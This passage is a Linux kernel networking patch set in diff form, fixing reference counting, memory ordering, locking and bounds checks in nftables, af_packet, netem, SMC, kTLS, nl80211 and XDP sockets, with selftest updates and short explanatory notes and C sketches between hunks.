+@@ -168,7 +168,7 @@ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 				nft_immediate_chain_deactivate(ctx, chain, phase);
+ 				nft_chain_del(chain);
+ 				chain->bound = false;
+-				chain->table->use--;
++				nft_use_dec(&chain->table->use);
+ 				break;
+ 			}
+ 			break;
+@@ -207,7 +207,7 @@ static void nft_immediate_destroy(const struct nft_ctx *ctx,
+ 		 * let the transaction records release this chain and its rules.
+ 		 */
+ 		if (chain->bound) {
+-			chain->use--;
++			nft_use_dec(&chain->use);
+ 			break;
+ 		}
+ 
+@@ -215,9 +215,9 @@ static void nft_immediate_destroy(const struct nft_ctx *ctx,
+ 		chain_ctx = *ctx;
+ 		chain_ctx.chain = chain;
+ 
+-		chain->use--;
++		nft_use_dec(&chain->use);
+ 		list_for_each_entry_safe(rule, n, &chain->rules, list) {
+-			chain->use--;
++			nft_use_dec(&chain->use);
+ 			list_del(&rule->list);
+ 			nf_tables_rule_destroy(&chain_ctx, rule);
+ 		}
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index 7f8e480b6be5b..0017bd3418722 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -41,8 +41,10 @@ static int nft_objref_init(const struct nft_ctx *ctx,
+ 	if (IS_ERR(obj))
+ 		return -ENOENT;
+ 
++	if (!nft_use_inc(&obj->use))
++		return -EMFILE;
++
+ 	nft_objref_priv(expr) = obj;
+-	obj->use++;
+ 
+ 	return 0;
+ }
+@@ -71,7 +73,7 @@ static void nft_objref_deactivate(const struct nft_ctx *ctx,
+ 	if (phase == NFT_TRANS_COMMIT)
+ 		return;
+ 
+-	obj->use--;
++	nft_use_dec(&obj->use);
+ }
+ 
+ static void nft_objref_activate(const struct nft_ctx *ctx,
+@@ -79,7 +81,7 @@ static void nft_objref_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_object *obj = nft_objref_priv(expr);
+ 
+-	obj->use++;
++	nft_use_inc_restore(&obj->use);
+ }
+ 
+ static struct nft_expr_type nft_objref_type;
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 1681068400733..451bd8bfafd23 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -404,18 +404,20 @@ static void __packet_set_status(struct packet_sock *po, void *frame, int status)
+ {
+ 	union tpacket_uhdr h;
+ 
++	/* WRITE_ONCE() are paired with READ_ONCE() in __packet_get_status */
++
+ 	h.raw = frame;
+ 	switch (po->tp_version) {
+ 	case TPACKET_V1:
+-		h.h1->tp_status = status;
++		WRITE_ONCE(h.h1->tp_status, status);
+ 		flush_dcache_page(pgv_to_page(&h.h1->tp_status));
+ 		break;
+ 	case TPACKET_V2:
+-		h.h2->tp_status = status;
++		WRITE_ONCE(h.h2->tp_status, status);
+ 		flush_dcache_page(pgv_to_page(&h.h2->tp_status));
+ 		break;
+ 	case TPACKET_V3:
+-		h.h3->tp_status = status;
++		WRITE_ONCE(h.h3->tp_status, status);
+ 		flush_dcache_page(pgv_to_page(&h.h3->tp_status));
+ 		break;
+ 	default:
+@@ -432,17 +434,19 @@ static int __packet_get_status(const struct packet_sock *po, void *frame)
+ 
+ 	smp_rmb();
+ 
++	/* READ_ONCE() are paired with WRITE_ONCE() in __packet_set_status */
++
+ 	h.raw = frame;
+ 	switch (po->tp_version) {
+ 	case TPACKET_V1:
+ 		flush_dcache_page(pgv_to_page(&h.h1->tp_status));
+-		return h.h1->tp_status;
++		return READ_ONCE(h.h1->tp_status);
+ 	case TPACKET_V2:
+ 		flush_dcache_page(pgv_to_page(&h.h2->tp_status));
+-		return h.h2->tp_status;
++		return READ_ONCE(h.h2->tp_status);
+ 	case TPACKET_V3:
+ 		flush_dcache_page(pgv_to_page(&h.h3->tp_status));
+-		return h.h3->tp_status;
++		return READ_ONCE(h.h3->tp_status);
+ 	default:
+ 		WARN(1, "TPACKET version not supported.\n");
+ 		BUG();
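
The tp_status annotations above mark the ring-slot status word, the handoff point between the kernel producer and the user-space consumer, so every access is a single tear-free load or store. A self-contained user-space analogue of that handoff, using C11 release/acquire atomics in place of the kernel's WRITE_ONCE()/smp_wmb() and smp_rmb()/READ_ONCE() pairs (illustrative names only):

#include <stdatomic.h>
#include <string.h>

#define SLOT_KERNEL	0UL	/* slot owned by the producer */
#define SLOT_USER	1UL	/* slot filled, owned by the consumer */

struct slot {
	atomic_ulong status;
	char payload[2048];
};

void produce(struct slot *s, const char *data, size_t len)
{
	memcpy(s->payload, data, len);
	/* release: payload writes are visible before the status flip */
	atomic_store_explicit(&s->status, SLOT_USER, memory_order_release);
}

int try_consume(struct slot *s, char *out, size_t len)
{
	/* acquire: read the payload only after observing SLOT_USER */
	if (atomic_load_explicit(&s->status, memory_order_acquire) != SLOT_USER)
		return 0;
	memcpy(out, s->payload, len);
	atomic_store_explicit(&s->status, SLOT_KERNEL, memory_order_release);
	return 1;
}
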
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index aa9842158df0a..d0e045116d4e9 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -773,12 +773,10 @@ static void dist_free(struct disttable *d)
+  * signed 16 bit values.
+  */
+ 
+-static int get_dist_table(struct Qdisc *sch, struct disttable **tbl,
+-			  const struct nlattr *attr)
++static int get_dist_table(struct disttable **tbl, const struct nlattr *attr)
+ {
+ 	size_t n = nla_len(attr)/sizeof(__s16);
+ 	const __s16 *data = nla_data(attr);
+-	spinlock_t *root_lock;
+ 	struct disttable *d;
+ 	int i;
+ 
+@@ -793,13 +791,7 @@ static int get_dist_table(struct Qdisc *sch, struct disttable **tbl,
+ 	for (i = 0; i < n; i++)
+ 		d->table[i] = data[i];
+ 
+-	root_lock = qdisc_root_sleeping_lock(sch);
+-
+-	spin_lock_bh(root_lock);
+-	swap(*tbl, d);
+-	spin_unlock_bh(root_lock);
+-
+-	dist_free(d);
++	*tbl = d;
+ 	return 0;
+ }
+ 
+@@ -956,6 +948,8 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ {
+ 	struct netem_sched_data *q = qdisc_priv(sch);
+ 	struct nlattr *tb[TCA_NETEM_MAX + 1];
++	struct disttable *delay_dist = NULL;
++	struct disttable *slot_dist = NULL;
+ 	struct tc_netem_qopt *qopt;
+ 	struct clgstate old_clg;
+ 	int old_loss_model = CLG_RANDOM;
+@@ -966,6 +960,18 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (tb[TCA_NETEM_DELAY_DIST]) {
++		ret = get_dist_table(&delay_dist, tb[TCA_NETEM_DELAY_DIST]);
++		if (ret)
++			goto table_free;
++	}
++
++	if (tb[TCA_NETEM_SLOT_DIST]) {
++		ret = get_dist_table(&slot_dist, tb[TCA_NETEM_SLOT_DIST]);
++		if (ret)
++			goto table_free;
++	}
++
+ 	sch_tree_lock(sch);
+ 	/* backup q->clg and q->loss_model */
+ 	old_clg = q->clg;
+@@ -975,26 +981,17 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 		ret = get_loss_clg(q, tb[TCA_NETEM_LOSS]);
+ 		if (ret) {
+ 			q->loss_model = old_loss_model;
++			q->clg = old_clg;
+ 			goto unlock;
+ 		}
+ 	} else {
+ 		q->loss_model = CLG_RANDOM;
+ 	}
+ 
+-	if (tb[TCA_NETEM_DELAY_DIST]) {
+-		ret = get_dist_table(sch, &q->delay_dist,
+-				     tb[TCA_NETEM_DELAY_DIST]);
+-		if (ret)
+-			goto get_table_failure;
+-	}
+-
+-	if (tb[TCA_NETEM_SLOT_DIST]) {
+-		ret = get_dist_table(sch, &q->slot_dist,
+-				     tb[TCA_NETEM_SLOT_DIST]);
+-		if (ret)
+-			goto get_table_failure;
+-	}
+-
++	if (delay_dist)
++		swap(q->delay_dist, delay_dist);
++	if (slot_dist)
++		swap(q->slot_dist, slot_dist);
+ 	sch->limit = qopt->limit;
+ 
+ 	q->latency = PSCHED_TICKS2NS(qopt->latency);
+@@ -1044,17 +1041,11 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 
+ unlock:
+ 	sch_tree_unlock(sch);
+-	return ret;
+ 
+-get_table_failure:
+-	/* recover clg and loss_model, in case of
+-	 * q->clg and q->loss_model were modified
+-	 * in get_loss_clg()
+-	 */
+-	q->clg = old_clg;
+-	q->loss_model = old_loss_model;
+-
+-	goto unlock;
++table_free:
++	dist_free(delay_dist);
++	dist_free(slot_dist);
++	return ret;
+ }
+ 
+ static int netem_init(struct Qdisc *sch, struct nlattr *opt,
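
The netem_change() restructuring above moves the sleeping allocations in get_dist_table() out from under the qdisc tree lock: build the replacement tables first, publish them by pointer swap while the lock is held, and free whatever was displaced (or never used) afterwards. The same shape in a stripped-down sketch; the types and names are made up for illustration:

#include <pthread.h>
#include <stdlib.h>
#include <string.h>

struct dist {
	size_t n;
	short v[];
};

struct sched {
	pthread_mutex_t lock;	/* stands in for sch_tree_lock() */
	struct dist *delay;
};

static struct dist *dist_build(const short *data, size_t n)
{
	struct dist *d = malloc(sizeof(*d) + n * sizeof(d->v[0]));

	if (!d)
		return NULL;
	d->n = n;
	memcpy(d->v, data, n * sizeof(d->v[0]));
	return d;
}

int sched_change(struct sched *s, const short *data, size_t n)
{
	/* sleeping allocation first, with no lock held */
	struct dist *new_tbl = dist_build(data, n);
	struct dist *old_tbl;

	if (!new_tbl)
		return -1;	/* -ENOMEM */

	pthread_mutex_lock(&s->lock);
	old_tbl = s->delay;	/* swap, don't free, under the lock */
	s->delay = new_tbl;
	pthread_mutex_unlock(&s->lock);

	free(old_tbl);		/* displaced table released outside the lock */
	return 0;
}
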
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 5ae0a54a823b5..5712a5297bd01 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -438,13 +438,60 @@ out:
+ 	return rc;
+ }
+ 
++/* copy only relevant settings and flags of SOL_SOCKET level from smc to
++ * clc socket (since smc is not called for these options from net/core)
++ */
++
++#define SK_FLAGS_SMC_TO_CLC ((1UL << SOCK_URGINLINE) | \
++			     (1UL << SOCK_KEEPOPEN) | \
++			     (1UL << SOCK_LINGER) | \
++			     (1UL << SOCK_BROADCAST) | \
++			     (1UL << SOCK_TIMESTAMP) | \
++			     (1UL << SOCK_DBG) | \
++			     (1UL << SOCK_RCVTSTAMP) | \
++			     (1UL << SOCK_RCVTSTAMPNS) | \
++			     (1UL << SOCK_LOCALROUTE) | \
++			     (1UL << SOCK_TIMESTAMPING_RX_SOFTWARE) | \
++			     (1UL << SOCK_RXQ_OVFL) | \
++			     (1UL << SOCK_WIFI_STATUS) | \
++			     (1UL << SOCK_NOFCS) | \
++			     (1UL << SOCK_FILTER_LOCKED) | \
++			     (1UL << SOCK_TSTAMP_NEW))
++
++/* if set, use value set by setsockopt() - else use IPv4 or SMC sysctl value */
++static void smc_adjust_sock_bufsizes(struct sock *nsk, struct sock *osk,
++				     unsigned long mask)
++{
++	struct net *nnet = sock_net(nsk);
++
++	nsk->sk_userlocks = osk->sk_userlocks;
++	if (osk->sk_userlocks & SOCK_SNDBUF_LOCK) {
++		nsk->sk_sndbuf = osk->sk_sndbuf;
++	} else {
++		if (mask == SK_FLAGS_SMC_TO_CLC)
++			WRITE_ONCE(nsk->sk_sndbuf,
++				   READ_ONCE(nnet->ipv4.sysctl_tcp_wmem[1]));
++		else
++			WRITE_ONCE(nsk->sk_sndbuf,
++				   2 * READ_ONCE(nnet->smc.sysctl_wmem));
++	}
++	if (osk->sk_userlocks & SOCK_RCVBUF_LOCK) {
++		nsk->sk_rcvbuf = osk->sk_rcvbuf;
++	} else {
++		if (mask == SK_FLAGS_SMC_TO_CLC)
++			WRITE_ONCE(nsk->sk_rcvbuf,
++				   READ_ONCE(nnet->ipv4.sysctl_tcp_rmem[1]));
++		else
++			WRITE_ONCE(nsk->sk_rcvbuf,
++				   2 * READ_ONCE(nnet->smc.sysctl_rmem));
++	}
++}
++
+ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+ 				   unsigned long mask)
+ {
+ 	/* options we don't get control via setsockopt for */
+ 	nsk->sk_type = osk->sk_type;
+-	nsk->sk_sndbuf = osk->sk_sndbuf;
+-	nsk->sk_rcvbuf = osk->sk_rcvbuf;
+ 	nsk->sk_sndtimeo = osk->sk_sndtimeo;
+ 	nsk->sk_rcvtimeo = osk->sk_rcvtimeo;
+ 	nsk->sk_mark = READ_ONCE(osk->sk_mark);
+@@ -455,26 +502,10 @@ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+ 
+ 	nsk->sk_flags &= ~mask;
+ 	nsk->sk_flags |= osk->sk_flags & mask;
++
++	smc_adjust_sock_bufsizes(nsk, osk, mask);
+ }
+ 
+-#define SK_FLAGS_SMC_TO_CLC ((1UL << SOCK_URGINLINE) | \
+-			     (1UL << SOCK_KEEPOPEN) | \
+-			     (1UL << SOCK_LINGER) | \
+-			     (1UL << SOCK_BROADCAST) | \
+-			     (1UL << SOCK_TIMESTAMP) | \
+-			     (1UL << SOCK_DBG) | \
+-			     (1UL << SOCK_RCVTSTAMP) | \
+-			     (1UL << SOCK_RCVTSTAMPNS) | \
+-			     (1UL << SOCK_LOCALROUTE) | \
+-			     (1UL << SOCK_TIMESTAMPING_RX_SOFTWARE) | \
+-			     (1UL << SOCK_RXQ_OVFL) | \
+-			     (1UL << SOCK_WIFI_STATUS) | \
+-			     (1UL << SOCK_NOFCS) | \
+-			     (1UL << SOCK_FILTER_LOCKED) | \
+-			     (1UL << SOCK_TSTAMP_NEW))
+-/* copy only relevant settings and flags of SOL_SOCKET level from smc to
+- * clc socket (since smc is not called for these options from net/core)
+- */
+ static void smc_copy_sock_settings_to_clc(struct smc_sock *smc)
+ {
+ 	smc_copy_sock_settings(smc->clcsock->sk, &smc->sk, SK_FLAGS_SMC_TO_CLC);
+@@ -2466,8 +2497,6 @@ static void smc_tcp_listen_work(struct work_struct *work)
+ 		sock_hold(lsk); /* sock_put in smc_listen_work */
+ 		INIT_WORK(&new_smc->smc_listen_work, smc_listen_work);
+ 		smc_copy_sock_settings_to_smc(new_smc);
+-		new_smc->sk.sk_sndbuf = lsmc->sk.sk_sndbuf;
+-		new_smc->sk.sk_rcvbuf = lsmc->sk.sk_rcvbuf;
+ 		sock_hold(&new_smc->sk); /* sock_put in passive closing */
+ 		if (!queue_work(smc_hs_wq, &new_smc->smc_listen_work))
+ 			sock_put(&new_smc->sk);
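
smc_adjust_sock_bufsizes() above encodes one rule: a buffer size pinned by setsockopt() (the SOCK_SNDBUF_LOCK/SOCK_RCVBUF_LOCK userlocks) is copied to the new socket verbatim, and anything else falls back to the TCP or SMC sysctl default instead of inheriting a possibly stale value. Reduced to its decision, roughly (hypothetical helper):

#define BUF_LOCKED	0x1	/* stands in for SOCK_SNDBUF_LOCK */

static int pick_bufsize(int userlocks, int inherited, int sysctl_default)
{
	if (userlocks & BUF_LOCKED)
		return inherited;	/* explicit setsockopt() value wins */
	return sysctl_default;		/* otherwise track the sysctl */
}
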
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index bf69c9d6d06c0..1849827884735 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -52,6 +52,8 @@ static LIST_HEAD(tls_device_list);
+ static LIST_HEAD(tls_device_down_list);
+ static DEFINE_SPINLOCK(tls_device_lock);
+ 
++static struct page *dummy_page;
++
+ static void tls_device_free_ctx(struct tls_context *ctx)
+ {
+ 	if (ctx->tx_conf == TLS_HW) {
+@@ -313,36 +315,33 @@ static int tls_push_record(struct sock *sk,
+ 	return tls_push_sg(sk, ctx, offload_ctx->sg_tx_data, 0, flags);
+ }
+ 
+-static int tls_device_record_close(struct sock *sk,
+-				   struct tls_context *ctx,
+-				   struct tls_record_info *record,
+-				   struct page_frag *pfrag,
+-				   unsigned char record_type)
++static void tls_device_record_close(struct sock *sk,
++				    struct tls_context *ctx,
++				    struct tls_record_info *record,
++				    struct page_frag *pfrag,
++				    unsigned char record_type)
+ {
+ 	struct tls_prot_info *prot = &ctx->prot_info;
+-	int ret;
++	struct page_frag dummy_tag_frag;
+ 
+ 	/* append tag
+ 	 * device will fill in the tag, we just need to append a placeholder
+ 	 * use socket memory to improve coalescing (re-using a single buffer
+ 	 * increases frag count)
+-	 * if we can't allocate memory now, steal some back from data
++	 * if we can't allocate memory now use the dummy page
+ 	 */
+-	if (likely(skb_page_frag_refill(prot->tag_size, pfrag,
+-					sk->sk_allocation))) {
+-		ret = 0;
+-		tls_append_frag(record, pfrag, prot->tag_size);
+-	} else {
+-		ret = prot->tag_size;
+-		if (record->len <= prot->overhead_size)
+-			return -ENOMEM;
++	if (unlikely(pfrag->size - pfrag->offset < prot->tag_size) &&
++	    !skb_page_frag_refill(prot->tag_size, pfrag, sk->sk_allocation)) {
++		dummy_tag_frag.page = dummy_page;
++		dummy_tag_frag.offset = 0;
++		pfrag = &dummy_tag_frag;
+ 	}
++	tls_append_frag(record, pfrag, prot->tag_size);
+ 
+ 	/* fill prepend */
+ 	tls_fill_prepend(ctx, skb_frag_address(&record->frags[0]),
+ 			 record->len - prot->overhead_size,
+ 			 record_type);
+-	return ret;
+ }
+ 
+ static int tls_create_new_record(struct tls_offload_context_tx *offload_ctx,
+@@ -535,18 +534,8 @@ last_record:
+ 
+ 		if (done || record->len >= max_open_record_len ||
+ 		    (record->num_frags >= MAX_SKB_FRAGS - 1)) {
+-			rc = tls_device_record_close(sk, tls_ctx, record,
+-						     pfrag, record_type);
+-			if (rc) {
+-				if (rc > 0) {
+-					size += rc;
+-				} else {
+-					size = orig_size;
+-					destroy_record(record);
+-					ctx->open_record = NULL;
+-					break;
+-				}
+-			}
++			tls_device_record_close(sk, tls_ctx, record,
++						pfrag, record_type);
+ 
+ 			rc = tls_push_record(sk,
+ 					     tls_ctx,
+@@ -1466,14 +1455,26 @@ int __init tls_device_init(void)
+ {
+ 	int err;
+ 
+-	destruct_wq = alloc_workqueue("ktls_device_destruct", 0, 0);
+-	if (!destruct_wq)
++	dummy_page = alloc_page(GFP_KERNEL);
++	if (!dummy_page)
+ 		return -ENOMEM;
+ 
++	destruct_wq = alloc_workqueue("ktls_device_destruct", 0, 0);
++	if (!destruct_wq) {
++		err = -ENOMEM;
++		goto err_free_dummy;
++	}
++
+ 	err = register_netdevice_notifier(&tls_dev_notifier);
+ 	if (err)
+-		destroy_workqueue(destruct_wq);
++		goto err_destroy_wq;
+ 
++	return 0;
++
++err_destroy_wq:
++	destroy_workqueue(destruct_wq);
++err_free_dummy:
++	put_page(dummy_page);
+ 	return err;
+ }
+ 
+@@ -1482,4 +1483,5 @@ void __exit tls_device_cleanup(void)
+ 	unregister_netdevice_notifier(&tls_dev_notifier);
+ 	destroy_workqueue(destruct_wq);
+ 	clean_acked_data_flush();
++	put_page(dummy_page);
+ }
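
The tls_device fix above removes a failure path outright: a dummy page is allocated once at init, so closing a record can always append the placeholder tag even when the per-socket page frag cannot be refilled (the device overwrites the tag bytes anyway). A stripped-down sketch of that fallback, with plain buffers standing in for struct page_frag:

#include <stddef.h>

static char fallback_buf[16];	/* stands in for the shared dummy page */

struct frag {
	char *base;
	size_t off, size;
};

/* Append a tag_size placeholder to 'out'; falls back to the shared
 * scratch buffer when 'pfrag' has no room, so it cannot fail. */
static void append_tag(struct frag *pfrag, size_t tag_size, struct frag *out)
{
	struct frag dummy = { fallback_buf, 0, sizeof(fallback_buf) };

	if (pfrag->size - pfrag->off < tag_size)
		pfrag = &dummy;

	out->base = pfrag->base + pfrag->off;
	out->off = 0;
	out->size = tag_size;
	pfrag->off += tag_size;
}
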
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 087c0c442e231..c2363d44a1ffc 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -5378,8 +5378,11 @@ nl80211_parse_mbssid_elems(struct wiphy *wiphy, struct nlattr *attrs)
+ 	if (!wiphy->mbssid_max_interfaces)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	nla_for_each_nested(nl_elems, attrs, rem_elems)
++	nla_for_each_nested(nl_elems, attrs, rem_elems) {
++		if (num_elems >= 255)
++			return ERR_PTR(-EINVAL);
+ 		num_elems++;
++	}
+ 
+ 	elems = kzalloc(struct_size(elems, elem, num_elems), GFP_KERNEL);
+ 	if (!elems)
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 22bf10ffbf2d1..f7592638e61d3 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -994,6 +994,7 @@ static int xsk_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
+ 				err = xp_alloc_tx_descs(xs->pool, xs);
+ 				if (err) {
+ 					xp_put_pool(xs->pool);
++					xs->pool = NULL;
+ 					sockfd_put(sock);
+ 					goto out_unlock;
+ 				}
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 9a1895747b153..84c730da36dd3 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -71,7 +71,9 @@
+ #include "varasm.h"
+ #include "stor-layout.h"
+ #include "internal-fn.h"
++#include "gimple.h"
+ #include "gimple-expr.h"
++#include "gimple-iterator.h"
+ #include "gimple-fold.h"
+ #include "context.h"
+ #include "tree-ssa-alias.h"
+@@ -85,10 +87,8 @@
+ #include "tree-eh.h"
+ #include "stmt.h"
+ #include "gimplify.h"
+-#include "gimple.h"
+ #include "tree-phinodes.h"
+ #include "tree-cfg.h"
+-#include "gimple-iterator.h"
+ #include "gimple-ssa.h"
+ #include "ssa-iterators.h"
+ 
+diff --git a/tools/testing/radix-tree/regression1.c b/tools/testing/radix-tree/regression1.c
+index a61c7bcbc72da..63f468bf8245c 100644
+--- a/tools/testing/radix-tree/regression1.c
++++ b/tools/testing/radix-tree/regression1.c
+@@ -177,7 +177,7 @@ void regression1_test(void)
+ 	nr_threads = 2;
+ 	pthread_barrier_init(&worker_barrier, NULL, nr_threads);
+ 
+-	threads = malloc(nr_threads * sizeof(pthread_t *));
++	threads = malloc(nr_threads * sizeof(*threads));
+ 
+ 	for (i = 0; i < nr_threads; i++) {
+ 		arg = i;
+diff --git a/tools/testing/selftests/net/fib_nexthops.sh b/tools/testing/selftests/net/fib_nexthops.sh
+index 0f5e88c8f4ffe..df8d90b51867a 100755
+--- a/tools/testing/selftests/net/fib_nexthops.sh
++++ b/tools/testing/selftests/net/fib_nexthops.sh
+@@ -1981,6 +1981,11 @@ basic()
+ 
+ 	run_cmd "$IP link set dev lo up"
+ 
++	# Dump should not loop endlessly when maximum nexthop ID is configured.
++	run_cmd "$IP nexthop add id $((2**32-1)) blackhole"
++	run_cmd "timeout 5 $IP nexthop"
++	log_test $? 0 "Maximum nexthop ID dump"
++
+ 	#
+ 	# groups
+ 	#
+@@ -2201,6 +2206,11 @@ basic_res()
+ 	run_cmd "$IP nexthop bucket list fdb"
+ 	log_test $? 255 "Dump all nexthop buckets with invalid 'fdb' keyword"
+ 
++	# Dump should not loop endlessly when maximum nexthop ID is configured.
++	run_cmd "$IP nexthop add id $((2**32-1)) group 1/2 type resilient buckets 4"
++	run_cmd "timeout 5 $IP nexthop bucket"
++	log_test $? 0 "Maximum nexthop ID dump"
++
+ 	#
+ 	# resilient nexthop buckets get requests
+ 	#
+diff --git a/tools/testing/selftests/net/forwarding/ethtool.sh b/tools/testing/selftests/net/forwarding/ethtool.sh
+index dbb9fcf759e0f..aa2eafb7b2437 100755
+--- a/tools/testing/selftests/net/forwarding/ethtool.sh
++++ b/tools/testing/selftests/net/forwarding/ethtool.sh
+@@ -286,6 +286,8 @@ different_speeds_autoneg_on()
+ 	ethtool -s $h1 autoneg on
+ }
+ 
++skip_on_veth
++
+ trap cleanup EXIT
+ 
+ setup_prepare
+diff --git a/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh b/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh
+index 072faa77f53bd..17f89c3b7c020 100755
+--- a/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh
++++ b/tools/testing/selftests/net/forwarding/ethtool_extended_state.sh
+@@ -108,6 +108,8 @@ no_cable()
+ 	ip link set dev $swp3 down
+ }
+ 
++skip_on_veth
++
+ setup_prepare
+ 
+ tests_run
+diff --git a/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh b/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh
+index eb9ec4a68f84b..7594bbb490292 100755
+--- a/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh
++++ b/tools/testing/selftests/net/forwarding/hw_stats_l3_gre.sh
+@@ -99,6 +99,8 @@ test_stats_rx()
+ 	test_stats g2a rx
+ }
+ 
++skip_on_veth
++
+ trap cleanup EXIT
+ 
+ setup_prepare
+diff --git a/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh b/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh
+index 9f5b3e2e5e954..49fa94b53a1ca 100755
+--- a/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh
++++ b/tools/testing/selftests/net/forwarding/ip6_forward_instats_vrf.sh
+@@ -14,6 +14,8 @@ ALL_TESTS="
+ NUM_NETIFS=4
+ source lib.sh
+ 
++require_command $TROUTE6
++
+ h1_create()
+ {
+ 	simple_if_init $h1 2001:1:1::2/64
+diff --git a/tools/testing/selftests/net/forwarding/lib.sh b/tools/testing/selftests/net/forwarding/lib.sh
+index f4721f1b2886b..06027772cf79a 100755
+--- a/tools/testing/selftests/net/forwarding/lib.sh
++++ b/tools/testing/selftests/net/forwarding/lib.sh
+@@ -30,6 +30,7 @@ REQUIRE_MZ=${REQUIRE_MZ:=yes}
+ REQUIRE_MTOOLS=${REQUIRE_MTOOLS:=no}
+ STABLE_MAC_ADDRS=${STABLE_MAC_ADDRS:=no}
+ TCPDUMP_EXTRA_FLAGS=${TCPDUMP_EXTRA_FLAGS:=}
++TROUTE6=${TROUTE6:=traceroute6}
+ 
+ relative_path="${BASH_SOURCE%/*}"
+ if [[ "$relative_path" == "${BASH_SOURCE}" ]]; then
+@@ -137,6 +138,17 @@ check_locked_port_support()
+ 	fi
+ }
+ 
++skip_on_veth()
++{
++	local kind=$(ip -j -d link show dev ${NETIFS[p1]} |
++		jq -r '.[].linkinfo.info_kind')
++
++	if [[ $kind == veth ]]; then
++		echo "SKIP: Test cannot be run with veth pairs"
++		exit $ksft_skip
++	fi
++}
++
+ if [[ "$(id -u)" -ne 0 ]]; then
+ 	echo "SKIP: need root privileges"
+ 	exit $ksft_skip
+@@ -199,6 +211,11 @@ create_netif_veth()
+ 	for ((i = 1; i <= NUM_NETIFS; ++i)); do
+ 		local j=$((i+1))
+ 
++		if [ -z ${NETIFS[p$i]} ]; then
++			echo "SKIP: Cannot create interface. Name not specified"
++			exit $ksft_skip
++		fi
++
+ 		ip link show dev ${NETIFS[p$i]} &> /dev/null
+ 		if [[ $? -ne 0 ]]; then
+ 			ip link add ${NETIFS[p$i]} type veth \
+diff --git a/tools/testing/selftests/net/forwarding/settings b/tools/testing/selftests/net/forwarding/settings
+new file mode 100644
+index 0000000000000..e7b9417537fbc
+--- /dev/null
++++ b/tools/testing/selftests/net/forwarding/settings
+@@ -0,0 +1 @@
++timeout=0
+diff --git a/tools/testing/selftests/net/forwarding/tc_flower.sh b/tools/testing/selftests/net/forwarding/tc_flower.sh
+index 683711f41aa9b..b1daad19b01ec 100755
+--- a/tools/testing/selftests/net/forwarding/tc_flower.sh
++++ b/tools/testing/selftests/net/forwarding/tc_flower.sh
+@@ -52,8 +52,8 @@ match_dst_mac_test()
+ 	tc_check_packets "dev $h2 ingress" 101 1
+ 	check_fail $? "Matched on a wrong filter"
+ 
+-	tc_check_packets "dev $h2 ingress" 102 1
+-	check_err $? "Did not match on correct filter"
++	tc_check_packets "dev $h2 ingress" 102 0
++	check_fail $? "Did not match on correct filter"
+ 
+ 	tc filter del dev $h2 ingress protocol ip pref 1 handle 101 flower
+ 	tc filter del dev $h2 ingress protocol ip pref 2 handle 102 flower
+@@ -78,8 +78,8 @@ match_src_mac_test()
+ 	tc_check_packets "dev $h2 ingress" 101 1
+ 	check_fail $? "Matched on a wrong filter"
+ 
+-	tc_check_packets "dev $h2 ingress" 102 1
+-	check_err $? "Did not match on correct filter"
++	tc_check_packets "dev $h2 ingress" 102 0
++	check_fail $? "Did not match on correct filter"
+ 
+ 	tc filter del dev $h2 ingress protocol ip pref 1 handle 101 flower
+ 	tc filter del dev $h2 ingress protocol ip pref 2 handle 102 flower
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a3108c3cff471..7b20878a1af59 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -650,6 +650,7 @@ pm_nl_del_endpoint()
+ 	local addr=$3
+ 
+ 	if [ $ip_mptcp -eq 1 ]; then
++		[ $id -ne 0 ] && addr=''
+ 		ip -n $ns mptcp endpoint delete id $id $addr
+ 	else
+ 		ip netns exec $ns ./pm_nl_ctl del $id $addr
+@@ -740,10 +741,11 @@ pm_nl_check_endpoint()
+ 	fi
+ 
+ 	if [ $ip_mptcp -eq 1 ]; then
++		# get line and trim trailing whitespace
+ 		line=$(ip -n $ns mptcp endpoint show $id)
++		line="${line% }"
+ 		# the dump order is: address id flags port dev
+-		expected_line="$addr"
+-		[ -n "$addr" ] && expected_line="$expected_line $addr"
++		[ -n "$addr" ] && expected_line="$addr"
+ 		expected_line="$expected_line $id"
